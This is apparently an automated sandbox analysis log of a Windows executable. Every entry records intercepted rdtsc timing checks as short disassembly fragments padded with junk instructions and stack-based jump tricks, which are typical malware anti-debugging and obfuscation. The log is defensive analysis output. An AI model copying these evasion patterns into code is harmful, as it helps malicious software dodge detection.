                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9BA4D second address: C9BAF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8AF15A7F5Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jc 00007F8AF15A7F57h 0x00000012 clc 0x00000013 push dword ptr fs:[00000000h] 0x0000001a movsx ebx, di 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007F8AF15A7F58h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 00000015h 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e mov ebx, 395FDE54h 0x00000043 mov bx, D7C4h 0x00000047 mov eax, dword ptr [ebp+122D0729h] 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F8AF15A7F58h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000018h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 sub edi, dword ptr [ebp+122DBA7Ch] 0x0000006d call 00007F8AF15A7F65h 0x00000072 mov ebx, 59A81FE1h 0x00000077 pop edi 0x00000078 push FFFFFFFFh 0x0000007a sub dword ptr [ebp+122D369Eh], esi 0x00000080 push eax 0x00000081 pushad 0x00000082 push eax 0x00000083 push edx 0x00000084 jng 00007F8AF15A7F56h 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9A88E second address: C9A941 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8AF10CF434h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+12455374h], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F8AF10CF428h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 add bx, 6ED1h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 or ebx, 1F028960h 0x00000047 mov eax, dword ptr [ebp+122D1119h] 0x0000004d jmp 00007F8AF10CF432h 0x00000052 mov dword ptr [ebp+122D1B79h], edx 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push ebx 0x0000005d call 00007F8AF10CF428h 0x00000062 pop ebx 0x00000063 mov dword ptr [esp+04h], ebx 0x00000067 add dword ptr [esp+04h], 0000001Ch 0x0000006f inc ebx 0x00000070 push ebx 0x00000071 ret 0x00000072 pop ebx 0x00000073 ret 0x00000074 push ebx 0x00000075 mov dword ptr [ebp+122D2834h], esi 0x0000007b pop edi 0x0000007c push eax 0x0000007d push edi 0x0000007e pushad 0x0000007f pushad 0x00000080 popad 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9D9F5 second address: C9D9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9D9FB second address: C9DA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9E88C second address: C9E891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9E891 second address: C9E8CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F8AF10CF426h 0x00000009 jmp 00007F8AF10CF436h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8AF10CF434h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA1F7C second address: CA1F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA1F80 second address: CA1F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA2EAB second address: CA2EC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F8AF15A7F58h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA2EC5 second address: CA2EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA2EC9 second address: CA2ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA2ECF second address: CA2F30 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8AF10CF42Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add dword ptr [ebp+122D1EFFh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F8AF10CF428h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F8AF10CF430h 0x00000032 mov ebx, 166EF59Eh 0x00000037 push 00000000h 0x00000039 mov ebx, dword ptr [ebp+122D38C3h] 0x0000003f push eax 0x00000040 pop ebx 0x00000041 push eax 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA2F30 second address: CA2F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA2F34 second address: CA2F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA3072 second address: CA3076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA3076 second address: CA307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA40F2 second address: CA4123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8AF15A7F63h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA4FF3 second address: CA4FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA3148 second address: CA314C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA314C second address: CA3160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA5F55 second address: CA5F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA0FA9 second address: CA0FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8AF10CF426h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CA0FB4 second address: CA102F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8AF15A7F5Ah 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F8AF15A7F58h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D3963h] 0x0000002e sub ebx, dword ptr [ebp+122D39CFh] 0x00000034 push dword ptr fs:[00000000h] 0x0000003b or dword ptr [ebp+1247EECAh], esi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov ebx, esi 0x0000004a mov eax, dword ptr [ebp+122D1701h] 0x00000050 jmp 00007F8AF15A7F5Ch 0x00000055 push FFFFFFFFh 0x00000057 push eax 0x00000058 pushad 0x00000059 jmp 00007F8AF15A7F5Ah 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CAF3B0 second address: CAF3E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF10CF438h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8AF10CF42Eh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CB9FDD second address: CB9FF1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8AF15A7F56h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F8AF15A7F5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4F7FB second address: C4F805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8AF10CF426h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4F805 second address: C4F823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8AF15A7F69h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C4F823 second address: C4F851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F8AF10CF44Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8AF10CF433h 0x0000001a je 00007F8AF10CF426h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC2780 second address: CC2784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC28F7 second address: CC28FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC28FB second address: CC290C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC290C second address: CC2920 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F8AF10CF426h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC7945 second address: CC7954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8AF15A7F56h 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC7954 second address: CC795A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC795A second address: CC795F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC795F second address: CC7971 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8AF10CF42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC7971 second address: CC7977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC7AD3 second address: CC7AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC7AD7 second address: CC7AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F60h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC7C9D second address: CC7CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CC7DE0 second address: CC7DE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C93E30 second address: C70EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, 7910D0A4h 0x0000000e lea eax, dword ptr [ebp+1248DBC5h] 0x00000014 clc 0x00000015 nop 0x00000016 jmp 00007F8AF10CF430h 0x0000001b push eax 0x0000001c jc 00007F8AF10CF42Eh 0x00000022 jng 00007F8AF10CF428h 0x00000028 push esi 0x00000029 pop esi 0x0000002a nop 0x0000002b jmp 00007F8AF10CF438h 0x00000030 jc 00007F8AF10CF42Bh 0x00000036 mov edi, 35E45866h 0x0000003b call dword ptr [ebp+122D1E01h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F8AF10CF435h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C94441 second address: C94446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C94446 second address: C9444C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9444C second address: C9448B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pushad 0x0000000b je 00007F8AF15A7F56h 0x00000011 jc 00007F8AF15A7F56h 0x00000017 popad 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F8AF15A7F67h 0x00000022 mov eax, dword ptr [eax] 0x00000024 js 00007F8AF15A7F5Eh 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9448B second address: C944F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jg 00007F8AF10CF435h 0x0000000f pop eax 0x00000010 sub dword ptr [ebp+122D3573h], edx 0x00000016 call 00007F8AF10CF429h 0x0000001b jng 00007F8AF10CF430h 0x00000021 push eax 0x00000022 jng 00007F8AF10CF445h 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c pushad 0x0000002d pushad 0x0000002e push eax 0x0000002f pop eax 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C944F9 second address: C94528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jbe 00007F8AF15A7F56h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 jg 00007F8AF15A7F5Ah 0x00000016 push ebx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 jmp 00007F8AF15A7F5Dh 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C94528 second address: C9452D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9458F second address: C9459A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8AF15A7F56h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C94901 second address: C94928 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8AF10CF438h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C94928 second address: C9492E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C9511C second address: C95137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C95137 second address: C71B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and di, 4A8Ah 0x00000010 call dword ptr [ebp+122D2743h] 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b jmp 00007F8AF15A7F60h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C71B41 second address: C71B83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F8AF10CF43Eh 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F8AF10CF435h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCBDA1 second address: CCBDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F8AF15A7F58h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCBDB1 second address: CCBDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCBDB7 second address: CCBDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8AF15A7F56h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f ja 00007F8AF15A7F56h 0x00000015 jnp 00007F8AF15A7F56h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCBDD9 second address: CCBDE9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF10CF426h 0x00000008 jno 00007F8AF10CF426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCBDE9 second address: CCBDEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCBDEF second address: CCBE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF438h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCBF5D second address: CCBF6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F8AF15A7F56h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCC0E3 second address: CCC0F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F8AF10CF426h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C944C3 second address: C944F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F8AF15A7F75h 0x0000000d jg 00007F8AF15A7F6Fh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCC358 second address: CCC35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCC35C second address: CCC369 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CCC61D second address: CCC625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD1233 second address: CD1253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F8AF15A7F94h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8AF15A7F63h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD1253 second address: CD126E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF437h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD14FD second address: CD1501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD1501 second address: CD1516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F8AF10CF42Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD1516 second address: CD151B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD151B second address: CD153D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8AF10CF426h 0x0000000a jmp 00007F8AF10CF438h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD1DAF second address: CD1DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD1F4C second address: CD1F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD1F50 second address: CD1F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD7F88 second address: CD7F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: CD7F8C second address: CD7FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8AF15A7F5Eh 0x0000000b rdtsc
